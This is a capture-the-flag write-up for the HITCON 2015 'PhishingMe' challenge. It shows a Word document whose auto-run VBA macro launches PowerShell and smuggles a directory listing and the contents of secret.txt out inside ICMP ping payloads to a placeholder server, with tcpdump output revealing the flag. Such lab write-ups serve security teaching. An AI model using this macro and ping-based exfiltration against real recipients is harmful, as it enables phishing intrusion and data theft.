CTF writeup: HITCON-PhishingMe

CTF writeup: HITCON-PhishingMe

If you send a .doc file with the topic "HITCON 2015", I will open it!

Find the flag in my file system. Note: I will open a macro for you ^ _________________ ^ [email protected]

Phishingmeinteresting Introduction: we can define a VBScript macro phishing in .doc. Here we go!

Prepare malicious files

First, we need a Microsoft Word. The. doc file needs to automatically run the script when it is opened. The process is as follows:

Create a. DOC file. And find the macro option from the Development Option List.

 

Create a new macro

 

The macro we created has tried to use cmd.exe to run a simple command.

Sub Auto_Open()         Call Debugging End Sub Sub AutoOpen()         Call Debugging End Sub Public Function Debugging() As Variant         Set objShell = CreateObject("Wscript.Shell")         strCmd = "cmd.exe /c ""ping SERVER_IP"""         Set objExec = objShell.Exec(strCmd) End Function

Put these in the macro window and save them.

 

To test whether the command is executed, let's take a look at our ping request:

tcpdump -nXX icmp

Save .doc, open it again, and then check the echo request returned by ICMP on the server:

10:25:49.351725 IP MY-TEST-IP > MY-IP: ICMP echo request, id 1, seq 21, length 40

Shweet !. The doc file runs normally on our end. Let's see if it works normally on the target end. After receiving the link, we will send the .doc file to phishing. me. hitcon.2015 # gmail.com. Wait a moment and check the communication.

10:29:21.411226 IP VICTIM-IP > MY-IP: ICMP echo request, id 1, seq 21, length 40

The command runs normally. What should we do next?

Repeated tests

First, I tried the common CTF competition strategy: Upload the Shell and then find the flag. We can try the following Powershell RAT from PowershellEmpire. After 30-45 minutes of testing, we realized that the callback function was not passed from the target machine to our server, even if they were running in a local test environment. There must be a firewall or something else to stop these outbound traffic. But we have received traffic from the server...

Fill FTW

We know that ICMP echo requests has been passed to our server, and we can also execute commands through VBScript. So is there anything here to send ping .... Powershell ?! (I'm very excited. This is my first time using Powershell in CTF.) let's take a look at how to send ICMP echo requests.

The Microsoft page defines System. Net. NetworkInformation. Ping as follows:

 

 

It seems that we need IP address, timeout, and a buffer as parameters?

Next let's take a look at the ICMP echo request RF diagram.

 

It turns out that the ICMP echo request has a data buffer, which can be set in the third parameter Send function.

Call this function in Powershell:

(New-Object System.Net.NetworkInformation.Ping).Send(server_ip, timeout, buffer)

Theoretically, we can buffer the command results of the region and see the results from the tcpdump output. We use ICMP to make a quick dir

powershell "$dir=dir; (New-Object System.Net.NetworkInformation.Ping).Send('SERVER_IP', 1000, $dir)"

Replacing this command in VBScript should be successful.

Sub Auto_Open()         Call Debugging End Sub Sub AutoOpen()         Call Debugging End Sub Public Function Debugging() As Variant         Set objShell = CreateObject("Wscript.Shell")         strCmd = "powershell ""$dir=dir;(New-Object System.Net.NetworkInformation.Ping).Send('OUR_SERVER_IP', 1000, [system.Text.Encoding]::UTF8.GetBytes($dir)"""         Set objExec = objShell.Exec(strCmd) End Function

Drop the target and get interesting results:

10:10:00.816080 IP VICTIM_IP > OUR_SERVER_IP: ICMP echo request, id 1, seq 19, length 75 0x0030:  6773 2050 726f 6772 616d 2046 696c 6573  gs.Program.Files 0x0040:  2050 726f 6772 616d 2046 696c 6573 2028  .Program.Files.( 0x0050:  7838 3629 2055 7365 7273 2057 696e 646f  x86).Users.Windo 0x0060:  7773 2073 6563 7265 742e 7478 74         ws.secret.txt

Secret.txt is the focus. Replace dir with type secret.txt to see if there are any good results:

Sub Auto_Open()         Call Debugging End SubSub AutoOpen()         Call Debugging End Sub Public Function Debugging() As Variant         Set objShell = CreateObject("Wscript.Shell")         strCmd = "powershell ""$dir=type secret.txt;(New-Object System.Net.NetworkInformation.Ping).Send('OUR_SERVER_IP', 1000, [system.Text.Encoding]::UTF8.GetBytes($dir)"""         Set objExec = objShell.Exec(strCmd) End Function

Result

10:11:35.383781 IP VICTIM_IP > OUR_SERVER_IP: ICMP echo request, id 1, seq 20, length 52  ... 0x0020:  .... .... .... .... .... 6869 7463 6f6e  hitcon 0x0030:  7b6d 3463 7230 5f6d 6131 7761 7265 5f31  {m4cr0_ma1ware_1 0x0040:  735f 6d34 6b31 6e67 5f61 5f63 306d 6562  s_m4k1ng_a_c0meb 0x0050:  3463 6b21 217d                           4ck!!}

Here we find

hitcon{m4cr0_ma1ware_1s_m4k1ng_a_c0meb4ck!!}

A cool challenge, especially the use of PowerShell